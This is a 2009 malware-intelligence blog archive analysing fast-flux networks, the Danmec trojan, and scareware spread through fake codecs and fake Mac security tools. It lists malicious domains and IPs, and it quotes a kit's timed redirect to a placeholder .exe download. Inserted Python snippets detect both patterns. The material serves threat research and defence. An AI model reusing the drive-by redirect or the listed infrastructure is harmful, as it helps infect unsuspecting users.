MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, computer criminology and information security in general, always from a perspective closely related to the field of intelligence.

31.1.09

Monthly compendium of information. January 2009

Pistus Malware Intelligence Blog
30.01.09 Understanding Fast-Flux networks
29.01.09 New strategy to disseminate the IE Defender scareware
28.01.09 Danmec Bot, Fast-Flux networks and recruitment of ...
27.01.09 Deception techniques that do not go out of style
26.01.09 Attacking Mac systems through false security tool
24.01.09 Massive exploitation of vulnerabilities through ghost
21.01.09 Schematic analysis of an attack from Web-based malware
17.01.09 A recent tour of scareware II
15.01.09 Malware attack via Drive-by-Download
12.01.09 Security "electronics" and spreading malware
06.01.09 A recent tour of scareware
04.01.09 State security according to Microsoft
01.01.09 Malware preinstalled


Evilfingers Blog
31.01.09 Electronic security and spread of malware
30.01.09 Understanding Fast-Flux networks
29.01.09 New strategy of social engineering to spread IE Defender
28.01.09 Danmec Bot, Fast-Flux networks and recruitment of Zombies PCs
27.01.09 Deception techniques that do not go out of fashion
26.01.09 Attacking Mac systems through false security tool
25.01.09 Massive servers through exploitation of vulnerabilities ghosts
19.01.09 Vulnerabilities & Proofs-of-concept
14.01.09 Malware attack via Internet
14.01.09 Malware attacks through web sites
10.01.09 Security in web browsers
09.01.09 Commonly exploited security weaknesses

ESET Latinoamérica Blog (Spanish)
29.01.09 How to install ESET Security on Ubuntu Linux
27.01.09 Fake pages created to spread malware with fake codecs
20.01.09 Phishing attack through Win32/Qhost
15.01.09 Creator of fake web browsers
14.01.09 History of malicious code
09.01.09 Conficker and the security issues surrounding it
08.01.09 Insecure Internet activity. Threat of virus attack
07.01.09 Drive-by-Download: another wolf in sheep's clothing
05.01.09 New course promoting false
01.01.09 Dec. Threat Report
30.12.08 Malicious wallpaper manager
29.12.08 Malicious anti-analysis techniques
28.12.08 Everyday social engineering
22.12.08 Learning about malware
17.12.08 Local pharming against banks in Mexico
14.12.08 Prevention against exploitation of vulnerabilities in IE
12.12.08 Malware for Dummies (virus genus)
11.12.08 Fake McDonald's email with malware
03.12.08 Configuring NOD32 Antivirus on MSN II

Jorge Mieres


30.1.09

Understanding Fast-Flux networks

Fast-Flux networks are an advanced methodology for spreading threats that is currently being actively exploited to infect computers, among many other crimes. The aim is to hide malicious activity behind IP addresses that are rotated every few seconds for the same domain, making it impossible to locate the hosts in order to identify and block them.

Each of the IP addresses assigned to these domains corresponds to a machine that was previously compromised by malicious code, as part of a botnet, and acts as a bridge between the computer requesting a specific resource and the server hosting that resource. This mode of operation of the network is called Single-Flux.

That is, in a normal process a client computer makes a request (GET) to the server, which responds to the client with the result; in a single-flux network the client's original request does not go to the server but to the zombie machine, and it is the zombie that makes the query to the server.

There is another methodology called Double-Flux which, in addition to the characteristics of single-flux, also applies the rotation to the domain's own name servers, exploiting the name resolution and domain registration services.


A simple DNS query against a domain makes it possible to establish whether it is part of a Fast-Flux network. The following example shows the different IP addresses returned for the domain www.lijg.ru.

;; QUESTION SECTION:
;www.lijg.ru. IN A

;; ANSWER SECTION:
www.lijg.ru. 600 IN A 24.107.209.119
www.lijg.ru. 600 IN A 24.219.191.246
www.lijg.ru. 600 IN A 65.65.208.223
www.lijg.ru. 600 IN A 65.102.56.213
www.lijg.ru. 600 IN A 67.141.208.227
www.lijg.ru. 600 IN A 68.124.161.76
www.lijg.ru. 600 IN A 69.14.27.151
www.lijg.ru. 600 IN A 70.251.45.186
www.lijg.ru. 600 IN A 71.12.89.105
www.lijg.ru. 600 IN A 71.235.251.99
www.lijg.ru. 600 IN A 75.11.10.101
www.lijg.ru. 600 IN A 75.75.104.133
www.lijg.ru. 600 IN A 97.104.40.246
www.lijg.ru. 600 IN A 173.16.99.131

;; AUTHORITY SECTION:
lijg.ru. 345600 IN NS ns5.lijg.ru.
lijg.ru. 345600 IN NS ns1.lijg.ru.
lijg.ru. 345600 IN NS ns2.lijg.ru.
lijg.ru. 345600 IN NS ns3.lijg.ru.
lijg.ru. 345600 IN NS ns4.lijg.ru.
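The check described above (many A records for one name, a short TTL, hosts scattered across unrelated consumer networks) can be automated over dig output like the answer shown here and the one in the Danmec post below. This is an added example written for this page, not code from the blog; the sample answer is constructed from the records quoted in the post and the thresholds are assumptions a defender would tune.

```python
import ipaddress
import re

# Constructed sample in dig(1) format, reproducing part of the answer quoted in the post.
SAMPLE_DIG = """\
;; QUESTION SECTION:
;www.lijg.ru.            IN A

;; ANSWER SECTION:
www.lijg.ru.    600 IN A 24.107.209.119
www.lijg.ru.    600 IN A 24.219.191.246
www.lijg.ru.    600 IN A 65.65.208.223
www.lijg.ru.    600 IN A 65.102.56.213
www.lijg.ru.    600 IN A 67.141.208.227
www.lijg.ru.    600 IN A 68.124.161.76
www.lijg.ru.    600 IN A 69.14.27.151
www.lijg.ru.    600 IN A 70.251.45.186

;; AUTHORITY SECTION:
lijg.ru.        345600 IN NS ns1.lijg.ru.
"""

# One A record per line: owner name, TTL, class, type, IPv4 address.
A_RECORD = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+A\s+(\d{1,3}(?:\.\d{1,3}){3})\s*$", re.M)


def parse_a_records(dig_output):
    """Return (name, ttl, IPv4Address) tuples for every A record in the output."""
    records = []
    for name, ttl, ip in A_RECORD.findall(dig_output):
        try:
            addr = ipaddress.IPv4Address(ip)
        except ValueError:  # skip garbled or out-of-range addresses
            continue
        records.append((name.rstrip("."), int(ttl), addr))
    return records


def fast_flux_score(dig_output, ttl_threshold=900, min_addresses=5):
    """Flag an answer as fast-flux-like when it has many addresses, a short TTL,
    and the addresses fall in many distinct /16 networks (unlike a CDN block)."""
    records = parse_a_records(dig_output)
    if not records:
        return {"addresses": 0, "networks": 0, "min_ttl": None, "suspicious": False}
    addrs = {ip for _, _, ip in records}
    nets = {ipaddress.ip_network(f"{ip}/16", strict=False) for ip in addrs}
    min_ttl = min(ttl for _, ttl, _ in records)
    suspicious = (len(addrs) >= min_addresses and min_ttl <= ttl_threshold
                  and len(nets) >= min_addresses)
    return {"addresses": len(addrs), "networks": len(nets),
            "min_ttl": min_ttl, "suspicious": suspicious}
```

A single lookup is only a snapshot; repeating the query after the TTL expires and seeing a different address set is the stronger confirmation of the rotation the post describes.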


On the other hand, they say a picture is worth a thousand words, so let's see what the following graph tells us, obtained from SecViz and produced by JaimeBlasco:

Representing Fast-Flux networks with graphical tools is an excellent alternative, since it allows us, in a single and very attractive view, to see how the network is composed from a structural point of view.

In this example the figure shows a series of Fast-Flux domains (blue) and each of the zombie PCs that make them up (red). When the relationships between each of the domains are traced, we notice that some zombies belong to multiple networks within a single FF network structure.

This gives the attacker a greater advantage, since he has a much broader pool of compromised machines that are used in a distributed way to spread more malware, send more spam, carry out more phishing attacks, and many other malicious and fraudulent activities.

Jorge Mieres


29.1.09

New strategy to disseminate the IE Defender scareware

IE Defender is one of the many fake security programs (scareware, also called rogue software) that constantly bombard users with the intent of infecting their computers through web sites that pretend to be legitimate.

However, new dissemination and deception strategies are being detected that do not follow the usual methodology of downloading the scareware from its own web site, but instead seek to trick users in other ways; in this case, IE Defender is being spread through web sites that promise mp3 music and movie downloads.

In either case, what is downloaded is not the promised album or movie but one of the variants of the IE Defender family.

All the pages used to spread the threat share the same IP address (216.240.151.112) for the download:


A not-so-minor detail that helps identify these malicious sites is that almost all of them imitate pages hosted on file-storage services such as Megaupload or Rapidshare, or sites designed directly for downloading warez.

Related information:
A recent tour of scareware II
A recent tour of scareware

Jorge Mieres


28.1.09

Danmec Bot, Fast-Flux networks and recruitment of Zombies PCs

Danmec, or Asprox, is the name of a trojan designed to recruit zombie machines while collecting confidential information from each of the victims it infects.

While this trojan is not new, it now uses more complex strategies than those usually employed by other malicious code, including its own early variants, such as Fast-Flux techniques to avoid detection by blocking programs and to infect as many computers as possible.

Currently, Fast-Flux networks are being actively and massively exploited by thousands of domains of Russian origin, among them those activated again by the botnets created by Danmec:



Each of these domains hosts the following JavaScript file, called script.js (MD5: ccec2c026a38ce139c16ae97065ccd91), which launches a Drive-by-Download:

The call made through the iframe tag goes to a URL that is part of an active Fast-Flux network.

;; QUESTION SECTION:
;google-analitycs.lijg.ru. IN A

;; ANSWER SECTION:
google-analitycs.lijg.ru. 600 IN A 68.119.39.129
google-analitycs.lijg.ru. 600 IN A 69.176.46.57
google-analitycs.lijg.ru. 600 IN A 71.12.89.233
google-analitycs.lijg.ru. 600 IN A 76.73.237.59
google-analitycs.lijg.ru. 600 IN A 97.104.40.246
google-analitycs.lijg.ru. 600 IN A 98.194.180.179
google-analitycs.lijg.ru. 600 IN A 146.57.249.100
google-analitycs.lijg.ru. 600 IN A 151.118.186.131
google-analitycs.lijg.ru. 600 IN A 165.166.236.74
google-analitycs.lijg.ru. 600 IN A 173.16.99.131
google-analitycs.lijg.ru. 600 IN A 173.17.180.79
google-analitycs.lijg.ru. 600 IN A 24.107.209.119
google-analitycs.lijg.ru. 600 IN A 24.170.188.201
google-analitycs.lijg.ru. 600 IN A 68.93.61.194

;; AUTHORITY SECTION:
lijg.ru. 339897 IN NS ns3.lijg.ru.
lijg.ru. 339897 IN NS ns2.lijg.ru.
lijg.ru. 339897 IN NS ns1.lijg.ru.
lijg.ru. 339897 IN NS ns5.lijg.ru.
lijg.ru. 339897 IN NS ns4.lijg.ru.

;; Query time: 263 msec
;; SERVER: 192.168.240.2#53(192.168.240.2)
;; WHEN: Sun Jan 25 20:31:57 2009
;; MSG SIZE rcvd: 356


Meanwhile, each of the web addresses listed above is a new farm of Fast-Flux networks with its own group of mirror IPs.

Fast-Flux is an advanced technique used for malicious purposes, together with others, for the propagation of threats. This forces us to be cautious at all times.

Jorge Mieres


27.1.09

Deception techniques that do not go out of style

Do we only learn the hard way?

One issue that motivates some daily reflection is why people keep falling into traps that are already well known to others.

Social Engineering techniques such as double file extensions, spaces between the file name and the extension and, since the Internet began to be used as an attack platform, techniques such as fake codecs are a small sample of them.

Web sites that host pornography are often among the most visited on the Internet and are also the most used by malware distributors to propagate threats. As much as we ask how it is possible that users still infect their computers through these deception strategies, the answer seems to lie in something as simple as "a high percentage of demand" for this kind of material, which is among the most sought after.

Malware creators know this well: the person who visits a pornographic site wants to see pornography, regardless of the format in which it is offered (video and/or image), and consequently, if that user is offered the download of one or even several "codecs" supposedly needed to view the video, it is likely that in most cases the user will download them.

The user will then see something similar to what is shown in the capture, which after a few seconds displays a pop-up window like the following:

The user, thinking it is a codec required to view the video, installs it. In fact, what is installed is malware which, as of today, is only detected by some antivirus companies.

On the other hand, there is an application consisting only of an HTML file that is used to propagate such actions massively, through any medium.

The application cannot create or modify malicious code, but it allows it to be spread in the classic manner described above. The only requirement is to host the HTML file on a server (or any zombie PC) and specify in its code the download address of the malware in the following portion of code:

window.setTimeout("location.href = 'http://servidor.com/archivo.exe'", 1000);
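A defender can look for exactly this pattern (a timer that, after a short delay, points the page at an executable download) when scanning served or captured HTML. This is an added example written for this page, not the kit's code or the author's; the sample HTML is constructed around the snippet quoted above, and the executable extension list is an assumption.

```python
import re

# Constructed sample: the kit's delayed redirect from the post, plus a benign
# timer that sends the visitor to a real video page, as the post says the kit offers.
SAMPLE_HTML = """<html><body>
<script>
window.setTimeout("location.href = 'http://servidor.com/archivo.exe'", 1000);
</script>
<script>
setTimeout(function () { window.location = "http://example.test/video.html"; }, 3000);
</script>
</body></html>"""

# setTimeout(<body>, <delay>) : body is either a string to evaluate or a function.
TIMER_CALL = re.compile(r"setTimeout\s*\((.*?),\s*(\d+)\s*\)", re.S)
# location = '...' or location.href = '...' inside the timer body.
LOCATION_TARGET = re.compile(r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]")
# Extensions (assumed list) that make a redirect target a direct executable download.
EXECUTABLE = re.compile(r"\.(exe|scr|com|pif|bat|msi)(?:[?#].*)?$", re.I)


def find_delayed_exe_redirects(html):
    """Return every timer-driven redirect whose target is an executable file."""
    hits = []
    for body, delay in TIMER_CALL.findall(html):
        for url in LOCATION_TARGET.findall(body):
            if EXECUTABLE.search(url):
                hits.append({"delay_ms": int(delay), "url": url})
    return hits


def is_fake_codec_page(html, max_delay_ms=5000):
    """A page that pushes an executable within a few seconds of loading fits the
    fake-codec pattern; longer delays are reported but not flagged."""
    return any(h["delay_ms"] <= max_delay_ms for h in find_delayed_exe_redirects(html))
```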

As an additional component, the kit also offers to redirect to a real video. This is part of the social engineering strategy and dispels any suspicion on the part of the user.

We are not talking only about techniques such as Drive-by-Download, exploits, scripting, code obfuscation and many others; we are talking about caution and common sense.

That is, it is not enough to rely only on antivirus solutions for security against the dangers of malicious code: in this case, and according to the VT (VirusTotal) report, antivirus currently offers us only 35.09% protection, with only 14 of 39 engines detecting the threat; the remaining 64.91% depends considerably on our own ability and common sense to detect potential malicious activity.

Jorge Mieres


26.1.09

Attacking Mac systems through false security tool

Who said it was only for Windows?

While it is true that the mass use of the various deception and infection techniques is extremely common on Windows platforms, security is the responsibility of every system regardless of infrastructure or platform, and so there are also rogue-type threats (also called scareware) for Mac systems.

In this case, the recent fake security tool called iMunizator (actually not so recent, since it took its first steps during 2007 and early 2008, but it is back in action) can be downloaded from different web sites that resolve to a single IP address (67.205.75.10), hosted in Ukraine by a web hosting company called iWeb Technologies Inc.

www. imunizator. com
www. imunizator. net
imunizator. com
imunizator. net
mac-imunizator. net

This malware shares "web space" with other, much better known rogues through the IP 70.38.19.203:

Antispyware Deluxe (AntiSpywareDeluxe. Com)
Antivirus 2009 (antivirus-2009-pro. Net)
Antivirus 2010 (av2010. Net)
Vista Antivirus 2008 (vav-2008. Net)

iMunizator has also been developing deception strategies for some time, changing domains and even changing its name (formerly MacSweeper).

A more interesting fact is that the transfer of funds to "buy" the fake tool is done through an e-commerce company called Plimus, an entirely legal company of Israeli origin with central offices in the USA (San Diego and Silicon Valley) and in Ukraine. That is why users will see the secure HTTPS protocol in the address bar, present in every recommendation and guideline that aims to provide security by showing that we are operating from a trusted site.

Current malware constantly seeks users' sensitive information for fraud, and a high percentage of the victims are on Windows platforms, but this case shows that malware writers are turning toward new targets. Consequently, we must apply the same good security practices regardless of the technology to which they are applied.

Related information
A recent tour of scareware II
A recent tour of scareware

Jorge Mieres
